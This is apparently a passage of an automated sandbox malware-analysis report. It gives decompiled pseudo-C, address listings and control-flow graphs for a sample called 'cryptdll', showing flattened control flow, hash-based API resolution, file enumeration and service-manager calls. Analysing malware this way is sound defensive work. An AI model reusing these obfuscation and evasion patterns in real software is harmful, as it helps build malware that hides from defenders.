                                                        					_t22 = 0x8a099c9;
                                                        					goto L1;
                                                        				} else {
                                                        					if(_t22 != 0x36cb81de) {
                                                        						goto L27;
                                                        					} else {
                                                        						_t33 =  *0x62df88;
                                                        						if(_t33 == 0) {
                                                        							_t33 = E00623E60(_t56, E00623F00(0x9bab0b12), 0xa53a5b1a, _t95);
                                                        							 *0x62df88 = _t33;
                                                        						}
                                                        						_t34 =  *_t33(_t56,  &_v1636);
                                                        						asm("sbb eax, eax");
                                                        						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
                                                        						goto L1;
                                                        					}
                                                        				}
                                                        				goto L40;
                                                        			}































                                                        0x006238fa
                                                        0x006238fc
                                                        0x006238fe
                                                        0x00623902
                                                        0x00623907
                                                        0x00623910
                                                        0x00623910
                                                        0x00623910
                                                        0x00623915
                                                        0x00000000
                                                        0x00000000
                                                        0x0062391b
                                                        0x00623a5f
                                                        0x00000000
                                                        0x00623921
                                                        0x00623926
                                                        0x00623a1e
                                                        0x00623a36
                                                        0x00623a36
                                                        0x00623a48
                                                        0x00623a4a
                                                        0x00623a4f
                                                        0x00623ba1
                                                        0x00623a55
                                                        0x00623a55
                                                        0x00000000
                                                        0x00623a55
                                                        0x0062392c
                                                        0x00623931
                                                        0x00623b70
                                                        0x00623b77
                                                        0x00623b8a
                                                        0x00623b8f
                                                        0x00623b8f
                                                        0x00000000
                                                        0x00623b95
                                                        0x0062393c
                                                        0x00623ab6
                                                        0x00623abb
                                                        0x00000000
                                                        0x00623acb
                                                        0x00623acb
                                                        0x00623acb
                                                        0x00623942
                                                        0x00623947
                                                        0x006239fd
                                                        0x00623a06
                                                        0x00623a0d
                                                        0x0062394d
                                                        0x00623953
                                                        0x00623974
                                                        0x00623976
                                                        0x00000000
                                                        0x00623978
                                                        0x00623982
                                                        0x00623984
                                                        0x0062398b
                                                        0x0062399e
                                                        0x006239a3
                                                        0x006239a3
                                                        0x006239bc
                                                        0x006239d8
                                                        0x006239dd
                                                        0x006239e2
                                                        0x006239e7
                                                        0x006239e7
                                                        0x00623955
                                                        0x00623955
                                                        0x0062395d
                                                        0x0062396d
                                                        0x0062396d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0062395d
                                                        0x00623953
                                                        0x00000000
                                                        0x00623947
                                                        0x0062393c
                                                        0x00623926
                                                        0x00000000
                                                        0x0062391b
                                                        0x00623a6e
                                                        0x00623ad6
                                                        0x00623ad8
                                                        0x00623adf
                                                        0x00623af2
                                                        0x00623af7
                                                        0x00623af7
                                                        0x00623b0b
                                                        0x00623b0d
                                                        0x00623b12
                                                        0x00623b17
                                                        0x00623b2a
                                                        0x00623b2f
                                                        0x00623b2f
                                                        0x00623b36
                                                        0x00623b38
                                                        0x00623b3f
                                                        0x00623b52
                                                        0x00623b57
                                                        0x00623b57
                                                        0x00623b60
                                                        0x00623b62
                                                        0x00623b66
                                                        0x00000000
                                                        0x00623a70
                                                        0x00623a75
                                                        0x00000000
                                                        0x00623a77
                                                        0x00623a77
                                                        0x00623a7e
                                                        0x00623a91
                                                        0x00623a96
                                                        0x00623a96
                                                        0x00623aa1
                                                        0x00623aa5
                                                        0x00623aac
                                                        0x00000000
                                                        0x00623aac
                                                        0x00623a75
                                                        0x00000000

                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00623A48
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292162710.0000000000621000.00000020.00000001.sdmp, Offset: 00620000, based on PE: true
                                                        • Associated: 0000000E.00000002.2292147578.0000000000620000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292182201.000000000062D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292198739.000000000062F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_620000_cryptdll.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID: .
                                                        • API String ID: 1974802433-248832578
                                                        • Opcode ID: e811caaa66fa03a7616f9bd75447131ed6cacf2cf7e79cb57313d355b9aaace7
                                                        • Instruction ID: 6398a108a1ca9d7b545f651dfc161798d2755a1012fbbd6bb04634e83fa677ac
                                                        • Opcode Fuzzy Hash: e811caaa66fa03a7616f9bd75447131ed6cacf2cf7e79cb57313d355b9aaace7
                                                        • Instruction Fuzzy Hash: 25511570B04A3147CB34AB68B8456BB369B9B91700F10092EF585D7391EB7ECF464F92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 658 625040-625057 659 62505c 658->659 660 625060-625066 659->660 661 6251af-6251b5 660->661 662 62506c 660->662 663 6251bb 661->663 664 6252f9-6252ff 661->664 665 625072-625078 662->665 666 625367-62536e 662->666 667 6251c1-6251c7 663->667 668 625277-62527e 663->668 671 625301-625308 664->671 672 6252e8-6252ee 664->672 669 62507a 665->669 670 6250f9-6250ff 665->670 673 625370-625386 call 623f00 call 623e60 666->673 674 62538b-625396 666->674 675 62526d-625272 667->675 676 6251cd-6251d3 667->676 681 625280-625296 call 623f00 call 623e60 668->681 682 62529b-6252c5 668->682 677 6250c2-6250c9 669->677 678 62507c-625082 669->678 679 625153-62515a 670->679 680 625101-625107 670->680 685 625325-625330 671->685 686 62530a-625320 call 623f00 call 623e60 671->686 683 6252f4 672->683 684 6253b9-6253c0 672->684 673->674 707 6253b3-6253b6 674->707 708 625398-6253ae call 623f00 call 623e60 674->708 675->660 676->672 697 6251d9-6251e0 676->697 693 6250e6-6250e9 677->693 694 6250cb-6250e1 call 623f00 call 623e60 677->694 690 625084-62508a 678->690 691 6250ad-6250c0 678->691 688 625177-625182 679->688 689 62515c-625172 call 623f00 call 623e60 679->689 680->672 698 62510d-625114 680->698 681->682 723 6252e2 682->723 724 6252c7-6252dd call 623f00 call 623e60 682->724 683->659 716 625332-625348 call 623f00 call 623e60 685->716 717 62534d-62535b RtlAllocateHeap 685->717 686->685 733 625184-62519a call 623f00 call 623e60 688->733 734 62519f-6251aa 688->734 689->688 690->672 702 625090-6250ab call 6242c0 690->702 691->660 725 6250ef-6250f4 693->725 694->693 709 6251e2-6251f8 call 623f00 call 623e60 697->709 710 6251fd-62521f 697->710 711 625131-62514e 698->711 712 625116-62512c call 623f00 call 623e60 698->712 702->659 707->684 708->707 709->710 710->725 752 625225-62522c 710->752 711->659 712->711 716->717 717->684 735 62535d-625362 717->735 723->672 724->723 725->659 733->734 734->659 735->659 753 625249-625268 752->753 754 62522e-625244 call 623f00 call 623e60 752->754 753->660 754->753
                                                        C-Code - Quality: 61%
                                                        			E00625040(intOrPtr __ecx, intOrPtr __edx) {
                                                        				char _v4;
                                                        				char _v8;
                                                        				char _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v20;
                                                        				intOrPtr _v24;
                                                        				void* _v28;
                                                        				void* _v36;
                                                        				intOrPtr _v44;
                                                        				signed int _v52;
                                                        				void* _v68;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t16;
                                                        				void* _t17;
                                                        				void* _t23;
                                                        				void* _t26;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t35;
                                                        				void* _t37;
                                                        				void* _t41;
                                                        				void* _t42;
                                                        				void* _t45;
                                                        				void* _t50;
                                                        				void* _t51;
                                                        				void* _t52;
                                                        				signed int _t53;
                                                        				void* _t58;
                                                        				intOrPtr* _t101;
                                                        				void* _t103;
                                                        				signed int _t104;
                                                        				void* _t105;
                                                        				void* _t107;
                                                        				void* _t108;
                                                        				void* _t112;
                                                        				void* _t115;
                                                        				void* _t116;
                                                        
                                                        				_t101 = _v12;
                                                        				_t58 = 0;
                                                        				_v16 = __edx;
                                                        				_t112 = 0;
                                                        				_v20 = __ecx;
                                                        				_t104 = 0x1ca940c1;
                                                        				while(1) {
                                                        					_t16 = _v28;
                                                        					while(1) {
                                                        						L2:
                                                        						_t115 = _t104 - 0x12f72f95;
                                                        						if(_t115 <= 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _t104 - 0x26342ffd;
                                                        						if(__eflags > 0) {
                                                        							__eflags = _t104 - 0x2fab56c4;
                                                        							if(_t104 != 0x2fab56c4) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t17 =  *0x62e494;
                                                        								__eflags = _t17;
                                                        								if(_t17 == 0) {
                                                        									_t17 = E00623E60(_t58, E00623F00(0x9bab0b12), 0x7facde30, _t112);
                                                        									 *0x62e494 = _t17;
                                                        								}
                                                        								_t105 =  *_t17();
                                                        								__eflags =  *0x62dd18;
                                                        								if( *0x62dd18 == 0) {
                                                        									 *0x62dd18 = E00623E60(_t58, E00623F00(0x9bab0b12), 0x9ff0609c, _t112);
                                                        								}
                                                        								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
                                                        								_t58 = _t16;
                                                        								__eflags = _t58;
                                                        								if(_t58 != 0) {
                                                        									_t104 = 0x8956eec;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(__eflags == 0) {
                                                        								_t23 =  *0x62e484;
                                                        								__eflags = _t23;
                                                        								if(_t23 == 0) {
                                                        									_t23 = E00623E60(_t58, E00623F00(0x26f5757c), 0x9e91db81, _t112);
                                                        									 *0x62e484 = _t23;
                                                        								}
                                                        								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
                                                        								asm("sbb esi, esi");
                                                        								_t26 =  *0x62e18c;
                                                        								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
                                                        								__eflags = _t26;
                                                        								if(_t26 == 0) {
                                                        									_t26 = E00623E60(_t58, E00623F00(0x26f5757c), 0x268fe5f0, _t112);
                                                        									 *0x62e18c = _t26;
                                                        								}
                                                        								_t16 =  *_t26(_v44);
                                                        								goto L40;
                                                        							} else {
                                                        								__eflags = _t104 - 0x1ca940c1;
                                                        								if(_t104 == 0x1ca940c1) {
                                                        									_t104 = 0x2fab56c4;
                                                        									continue;
                                                        								} else {
                                                        									__eflags = _t104 - 0x254bd927;
                                                        									if(_t104 != 0x254bd927) {
                                                        										L40:
                                                        										__eflags = _t104 - 0x1f0f293e;
                                                        										if(_t104 != 0x1f0f293e) {
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									} else {
                                                        										_t50 =  *0x62e29c;
                                                        										__eflags = _t50;
                                                        										if(_t50 == 0) {
                                                        											_t50 = E00623E60(_t58, E00623F00(0x26f5757c), 0x4574c66, _t112);
                                                        											 *0x62e29c = _t50;
                                                        										}
                                                        										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
                                                        										__eflags = _t51;
                                                        										if(_t51 == 0) {
                                                        											L13:
                                                        											_t104 = 0x11e09e52;
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										} else {
                                                        											_t52 =  *0x62de08;
                                                        											__eflags = _t52;
                                                        											if(_t52 == 0) {
                                                        												_t52 = E00623E60(_t58, E00623F00(0x9bab0b12), 0xd8ef4c49, _t112);
                                                        												 *0x62de08 = _t52;
                                                        											}
                                                        											_t53 =  *_t52();
                                                        											_t104 = 0x128dff18;
                                                        											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
                                                        											_t16 = _t58 + _v52 * 0x2c;
                                                        											__eflags = _t103 - _t16;
                                                        											_v68 = _t16;
                                                        											_t101 =  >=  ? _t58 : _t103;
                                                        											continue;
                                                        										}
                                                        										L55:
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L54:
                                                        						return _t16;
                                                        						goto L55;
                                                        					}
                                                        					if(_t115 == 0) {
                                                        						_t29 =  *0x62e494;
                                                        						__eflags = _t29;
                                                        						if(_t29 == 0) {
                                                        							_t29 = E00623E60(_t58, E00623F00(0x9bab0b12), 0x7facde30, _t112);
                                                        							 *0x62e494 = _t29;
                                                        						}
                                                        						_t107 =  *_t29();
                                                        						_t31 =  *0x62df30;
                                                        						__eflags = _t31;
                                                        						if(_t31 == 0) {
                                                        							_t31 = E00623E60(_t58, E00623F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        							 *0x62df30 = _t31;
                                                        						}
                                                        						return  *_t31(_t107, 0, _t58);
                                                        					}
                                                        					_t116 = _t104 - 0x10f7fbef;
                                                        					if(_t116 > 0) {
                                                        						__eflags = _t104 - 0x11e09e52;
                                                        						if(_t104 == 0x11e09e52) {
                                                        							_t35 =  *0x62e494;
                                                        							__eflags = _t35;
                                                        							if(_t35 == 0) {
                                                        								_t35 = E00623E60(_t58, E00623F00(0x9bab0b12), 0x7facde30, _t112);
                                                        								 *0x62e494 = _t35;
                                                        							}
                                                        							_t108 =  *_t35();
                                                        							_t37 =  *0x62df30;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E00623E60(_t58, E00623F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        								 *0x62df30 = _t37;
                                                        							}
                                                        							 *_t37(_t108, 0, _t112);
                                                        							_t104 = 0x12f72f95;
                                                        							continue;
                                                        						} else {
                                                        							__eflags = _t104 - 0x128dff18;
                                                        							if(_t104 != 0x128dff18) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t41 =  *0x62e270;
                                                        								__eflags = _t41;
                                                        								if(_t41 == 0) {
                                                        									_t41 = E00623E60(_t58, E00623F00(0x26f5757c), 0x56e230f9, _t112);
                                                        									 *0x62e270 = _t41;
                                                        								}
                                                        								_t42 =  *_t41(_v20,  *_t101, 1);
                                                        								__eflags = _t42;
                                                        								_v36 = _t42;
                                                        								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
                                                        								while(1) {
                                                        									_t16 = _v28;
                                                        									goto L2;
                                                        								}
                                                        							}
                                                        						}
                                                        					} else {
                                                        						if(_t116 == 0) {
                                                        							_t45 =  *0x62e200;
                                                        							__eflags = _t45;
                                                        							if(_t45 == 0) {
                                                        								_t45 = E00623E60(_t58, E00623F00(0x26f5757c), 0x16d40839, _t112);
                                                        								 *0x62e200 = _t45;
                                                        							}
                                                        							 *_t45(_v16, 1, _t112);
                                                        							goto L13;
                                                        						} else {
                                                        							if(_t104 == 0x5d498c4) {
                                                        								_t101 = _t101 + 0x2c;
                                                        								__eflags = _t101 - _t16;
                                                        								asm("sbb esi, esi");
                                                        								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t104 != 0x8956eec) {
                                                        									goto L40;
                                                        								} else {
                                                        									_t112 = E006242C0(_t58, 0x2000);
                                                        									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L54;
                                                        				}
                                                        			}









































                                                        0x00625047
                                                        0x0062504b
                                                        0x0062504d
                                                        0x00625051
                                                        0x00625053
                                                        0x00625057
                                                        0x0062505c
                                                        0x0062505c
                                                        0x00625060
                                                        0x00625060
                                                        0x00625060
                                                        0x00625066
                                                        0x00000000
                                                        0x00000000
                                                        0x006251af
                                                        0x006251b5
                                                        0x006252f9
                                                        0x006252ff
                                                        0x00000000
                                                        0x00625301
                                                        0x00625301
                                                        0x00625306
                                                        0x00625308
                                                        0x0062531b
                                                        0x00625320
                                                        0x00625320
                                                        0x00625327
                                                        0x0062532e
                                                        0x00625330
                                                        0x00625348
                                                        0x00625348
                                                        0x00625355
                                                        0x00625357
                                                        0x00625359
                                                        0x0062535b
                                                        0x0062535d
                                                        0x0062505c
                                                        0x0062505c
                                                        0x00000000
                                                        0x0062505c
                                                        0x0062505c
                                                        0x0062535b
                                                        0x006251bb
                                                        0x006251bb
                                                        0x00625277
                                                        0x0062527c
                                                        0x0062527e
                                                        0x00625291
                                                        0x00625296
                                                        0x00625296
                                                        0x006252ac
                                                        0x006252b0
                                                        0x006252b2
                                                        0x006252bd
                                                        0x006252c3
                                                        0x006252c5
                                                        0x006252d8
                                                        0x006252dd
                                                        0x006252dd
                                                        0x006252e6
                                                        0x00000000
                                                        0x006251c1
                                                        0x006251c1
                                                        0x006251c7
                                                        0x0062526d
                                                        0x00000000
                                                        0x006251cd
                                                        0x006251cd
                                                        0x006251d3
                                                        0x006252e8
                                                        0x006252e8
                                                        0x006252ee
                                                        0x0062505c
                                                        0x0062505c
                                                        0x00000000
                                                        0x0062505c
                                                        0x0062505c
                                                        0x006251d9
                                                        0x006251d9
                                                        0x006251de
                                                        0x006251e0
                                                        0x006251f3
                                                        0x006251f8
                                                        0x006251f8
                                                        0x0062521b
                                                        0x0062521d
                                                        0x0062521f
                                                        0x006250ef
                                                        0x006250ef
                                                        0x0062505c
                                                        0x0062505c
                                                        0x00000000
                                                        0x0062505c
                                                        0x00625225
                                                        0x00625225
                                                        0x0062522a
                                                        0x0062522c
                                                        0x0062523f
                                                        0x00625244
                                                        0x00625244
                                                        0x00625249
                                                        0x0062524e
                                                        0x0062525b
                                                        0x0062525d
                                                        0x0062525f
                                                        0x00625261
                                                        0x00625265
                                                        0x00000000
                                                        0x00625265
                                                        0x00000000
                                                        0x0062521f
                                                        0x006251d3
                                                        0x006251c7
                                                        0x006251bb
                                                        0x006253c0
                                                        0x006253c0
                                                        0x00000000
                                                        0x006253c0
                                                        0x0062506c
                                                        0x00625367
                                                        0x0062536c
                                                        0x0062536e
                                                        0x00625381
                                                        0x00625386
                                                        0x00625386
                                                        0x0062538d
                                                        0x0062538f
                                                        0x00625394
                                                        0x00625396
                                                        0x006253a9
                                                        0x006253ae
                                                        0x006253ae
                                                        0x00000000
                                                        0x006253b7
                                                        0x00625072
                                                        0x00625078
                                                        0x006250f9
                                                        0x006250ff
                                                        0x00625153
                                                        0x00625158
                                                        0x0062515a
                                                        0x0062516d
                                                        0x00625172
                                                        0x00625172
                                                        0x00625179
                                                        0x0062517b
                                                        0x00625180
                                                        0x00625182
                                                        0x00625195
                                                        0x0062519a
                                                        0x0062519a
                                                        0x006251a3
                                                        0x006251a5
                                                        0x00000000
                                                        0x00625101
                                                        0x00625101
                                                        0x00625107
                                                        0x00000000
                                                        0x0062510d
                                                        0x0062510d
                                                        0x00625112
                                                        0x00625114
                                                        0x00625127
                                                        0x0062512c
                                                        0x0062512c
                                                        0x00625139
                                                        0x0062513b
                                                        0x0062513d
                                                        0x0062514b
                                                        0x0062505c
                                                        0x0062505c
                                                        0x00000000
                                                        0x0062505c
                                                        0x0062505c
                                                        0x00625107
                                                        0x0062507a
                                                        0x0062507a
                                                        0x006250c2
                                                        0x006250c7
                                                        0x006250c9
                                                        0x006250dc
                                                        0x006250e1
                                                        0x006250e1
                                                        0x006250ed
                                                        0x00000000
                                                        0x0062507c
                                                        0x00625082
                                                        0x006250ad
                                                        0x006250b0
                                                        0x006250b2
                                                        0x006250ba
                                                        0x00000000
                                                        0x00625084
                                                        0x0062508a
                                                        0x00000000
                                                        0x00625090
                                                        0x0062509a
                                                        0x006250a8
                                                        0x0062505c
                                                        0x0062505c
                                                        0x00000000
                                                        0x0062505c
                                                        0x0062505c
                                                        0x0062508a
                                                        0x00625082
                                                        0x0062507a
                                                        0x00000000
                                                        0x00625078

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,00628AC8,?,3251FEFE,?,?), ref: 00625355
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292162710.0000000000621000.00000020.00000001.sdmp, Offset: 00620000, based on PE: true
                                                        • Associated: 0000000E.00000002.2292147578.0000000000620000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292182201.000000000062D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292198739.000000000062F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_620000_cryptdll.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 6362da00823d16885ecf6f310b5038c99b6a18dbecbb9f31973a1d7f043860d9
                                                        • Instruction ID: 44ecb7ea324a4ebf407c9ebff9c662282c21719262b2a2149e73ef1f6f709b28
                                                        • Opcode Fuzzy Hash: 6362da00823d16885ecf6f310b5038c99b6a18dbecbb9f31973a1d7f043860d9
                                                        • Instruction Fuzzy Hash: 8A81D231B00F318BDB34AB78BC9576A36DBAB90744F51042DF852EB395EA358E054F86
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        C-Code - Quality: 73%
                                                        			E00629860() {
                                                        				char _v524;
                                                        				unsigned int _v528;
                                                        				char _v536;
                                                        				void* _v544;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t28;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t37;
                                                        				void* _t39;
                                                        				void* _t40;
                                                        				void* _t47;
                                                        				void* _t49;
                                                        				void* _t50;
                                                        				void* _t53;
                                                        				void* _t56;
                                                        				intOrPtr* _t60;
                                                        				intOrPtr _t62;
                                                        				void* _t64;
                                                        				void* _t69;
                                                        				void* _t72;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				intOrPtr _t94;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        
                                                        				_t64 = 0;
                                                        				_t28 = 0x29f9e503;
                                                        				_t92 = _v528;
                                                        				_t2 = _t64 + 1; // 0x1
                                                        				_t94 = _t2;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t97 = _t28 - 0x13fee53b;
                                                        						if(_t97 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t97 == 0) {
                                                        							__eflags =  *0x62e310;
                                                        							if( *0x62e310 == 0) {
                                                        								 *0x62e310 = E00623E60(_t64, E00623F00(0x26f5757c), 0x9ba7cd1, _t94);
                                                        							}
                                                        							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                        							_t92 = _t49;
                                                        							__eflags = _t92;
                                                        							if(_t92 == 0) {
                                                        								_t28 = 0x23c48583;
                                                        							} else {
                                                        								_t50 =  *0x62e54c; // 0x8ddff8
                                                        								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
                                                        								_t28 = 0xc471eb;
                                                        							}
                                                        							continue;
                                                        						} else {
                                                        							_t98 = _t28 - 0x9835f84;
                                                        							if(_t98 > 0) {
                                                        								__eflags = _t28 - 0xc0f0991;
                                                        								if(_t28 != 0xc0f0991) {
                                                        									goto L36;
                                                        								} else {
                                                        									_t69 =  *0x62dbd8;
                                                        									__eflags = _t69;
                                                        									if(_t69 == 0) {
                                                        										_t69 = E00623E60(_t64, E00623F00(0xd9518805), 0x141622d6, _t94);
                                                        										 *0x62dbd8 = _t69;
                                                        									}
                                                        									_t53 =  *0x62e54c; // 0x8ddff8
                                                        									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
                                                        									__eflags = _t56;
                                                        									_t28 = 0x9835f84;
                                                        									_t64 =  ==  ? _t94 : _t64;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t98 == 0) {
                                                        									E00627C60(_t94);
                                                        									_t28 = 0x6addd5c;
                                                        									continue;
                                                        								} else {
                                                        									if(_t28 == 0xc471eb) {
                                                        										_v528 = 0xc1a3;
                                                        										_t28 = 0x179ed98e;
                                                        										_v528 = _v528 + 0xffff1ad7;
                                                        										_v528 = _v528 ^ 0xffffdc53;
                                                        										continue;
                                                        									} else {
                                                        										if(_t28 != 0x6addd5c) {
                                                        											goto L36;
                                                        										} else {
                                                        											_t60 =  *0x62e3f4;
                                                        											if(_t60 == 0) {
                                                        												_t60 = E00623E60(_t64, E00623F00(0x9bab0b12), 0x7dc9b9bb, _t94);
                                                        												 *0x62e3f4 = _t60;
                                                        											}
                                                        											 *_t60(0,  &_v524, 0x104);
                                                        											_t62 = E00623D00( &_v536);
                                                        											_t72 =  *0x62e54c; // 0x8ddff8
                                                        											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
                                                        											_t28 = 0x39ea8110;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L42:
                                                        					}
                                                        					__eflags = _t28 - 0x29f9e503;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t28 - 0x39ea8110;
                                                        						if(_t28 == 0x39ea8110) {
                                                        							_t29 =  *0x62dbd8;
                                                        							__eflags = _t29;
                                                        							if(_t29 == 0) {
                                                        								_t29 = E00623E60(_t64, E00623F00(0xd9518805), 0x141622d6, _t94);
                                                        								 *0x62dbd8 = _t29;
                                                        							}
                                                        							 *_t29(0, 0x25, 0, 0,  &_v524);
                                                        							_t31 =  *0x62e54c; // 0x8ddff8
                                                        							_t32 = _t31 + 0x234;
                                                        							__eflags = _t31 + 0x234;
                                                        							E00623040(_t32);
                                                        							goto L41;
                                                        						} else {
                                                        							goto L36;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							_t37 =  *0x62e494;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E00623E60(_t64, E00623F00(0x9bab0b12), 0x7facde30, _t94);
                                                        								 *0x62e494 = _t37;
                                                        							}
                                                        							_t93 =  *_t37();
                                                        							_t39 =  *0x62dd18;
                                                        							__eflags = _t39;
                                                        							if(_t39 == 0) {
                                                        								_t39 = E00623E60(_t64, E00623F00(0x9bab0b12), 0x9ff0609c, _t94);
                                                        								 *0x62dd18 = _t39;
                                                        							}
                                                        							_t40 =  *_t39(_t93, 8, 0x480);
                                                        							 *0x62e54c = _t40;
                                                        							__eflags = _t40;
                                                        							if(_t40 == 0) {
                                                        								L41:
                                                        								return _t64;
                                                        							} else {
                                                        								 *((intOrPtr*)(_t40 + 4)) = E00627E40;
                                                        								_t28 = 0x13fee53b;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							__eflags = _t28 - 0x179ed98e;
                                                        							if(_t28 == 0x179ed98e) {
                                                        								__eflags =  *0x62e18c;
                                                        								if( *0x62e18c == 0) {
                                                        									 *0x62e18c = E00623E60(_t64, E00623F00(0x26f5757c), 0x268fe5f0, _t94);
                                                        								}
                                                        								CloseServiceHandle(_t92); // executed
                                                        								_t28 = 0xc0f0991;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t28 - 0x23c48583;
                                                        								if(_t28 != 0x23c48583) {
                                                        									goto L36;
                                                        								} else {
                                                        									_v528 = 0x5332;
                                                        									_v528 = _v528 << 6;
                                                        									_v528 = _v528 >> 0xf;
                                                        									_v528 = _v528 + 0xffffb18f;
                                                        									_v528 = _v528 >> 3;
                                                        									_v528 = _v528 ^ 0x1ffff62b;
                                                        									_t47 =  *0x62e54c; // 0x8ddff8
                                                        									 *((intOrPtr*)(_t47 + 8)) = 0x627e30;
                                                        									_t28 = 0xc0f0991;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L42;
                                                        					L36:
                                                        					__eflags = _t28 - 0x305b3459;
                                                        				} while (_t28 != 0x305b3459);
                                                        				return _t64;
                                                        				goto L42;
                                                        			}






























                                                        0x00629868
                                                        0x0062986a
                                                        0x00629871
                                                        0x00629875
                                                        0x00629875
                                                        0x00629878
                                                        0x00629880
                                                        0x00629880
                                                        0x00629880
                                                        0x00629880
                                                        0x00629885
                                                        0x00000000
                                                        0x00000000
                                                        0x0062988b
                                                        0x00629993
                                                        0x00629995
                                                        0x006299ad
                                                        0x006299ad
                                                        0x006299bb
                                                        0x006299bd
                                                        0x006299bf
                                                        0x006299c1
                                                        0x006299d8
                                                        0x006299c3
                                                        0x006299c3
                                                        0x006299c8
                                                        0x006299ce
                                                        0x006299ce
                                                        0x00000000
                                                        0x00629891
                                                        0x00629891
                                                        0x00629896
                                                        0x00629936
                                                        0x0062993b
                                                        0x00000000
                                                        0x00629941
                                                        0x00629941
                                                        0x00629947
                                                        0x00629949
                                                        0x00629961
                                                        0x00629963
                                                        0x00629963
                                                        0x00629969
                                                        0x0062997d
                                                        0x0062997f
                                                        0x00629981
                                                        0x00629986
                                                        0x00000000
                                                        0x00629986
                                                        0x0062989c
                                                        0x0062989c
                                                        0x00629927
                                                        0x0062992c
                                                        0x00000000
                                                        0x006298a2
                                                        0x006298a7
                                                        0x00629905
                                                        0x0062990d
                                                        0x00629912
                                                        0x0062991a
                                                        0x00000000
                                                        0x006298a9
                                                        0x006298ae
                                                        0x00000000
                                                        0x006298b4
                                                        0x006298b4
                                                        0x006298bb
                                                        0x006298ce
                                                        0x006298d3
                                                        0x006298d3
                                                        0x006298e4
                                                        0x006298ea
                                                        0x006298ef
                                                        0x006298f5
                                                        0x006298fb
                                                        0x00000000
                                                        0x006298fb
                                                        0x006298ae
                                                        0x006298a7
                                                        0x0062989c
                                                        0x00629896
                                                        0x00000000
                                                        0x0062988b
                                                        0x006299e2
                                                        0x006299e7
                                                        0x00629ae3
                                                        0x00629ae8
                                                        0x00629b02
                                                        0x00629b07
                                                        0x00629b09
                                                        0x00629b1c
                                                        0x00629b21
                                                        0x00629b21
                                                        0x00629b33
                                                        0x00629b35
                                                        0x00629b3e
                                                        0x00629b3e
                                                        0x00629b44
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x006299ed
                                                        0x006299ed
                                                        0x00629a73
                                                        0x00629a78
                                                        0x00629a7a
                                                        0x00629a8d
                                                        0x00629a92
                                                        0x00629a92
                                                        0x00629a99
                                                        0x00629a9b
                                                        0x00629aa0
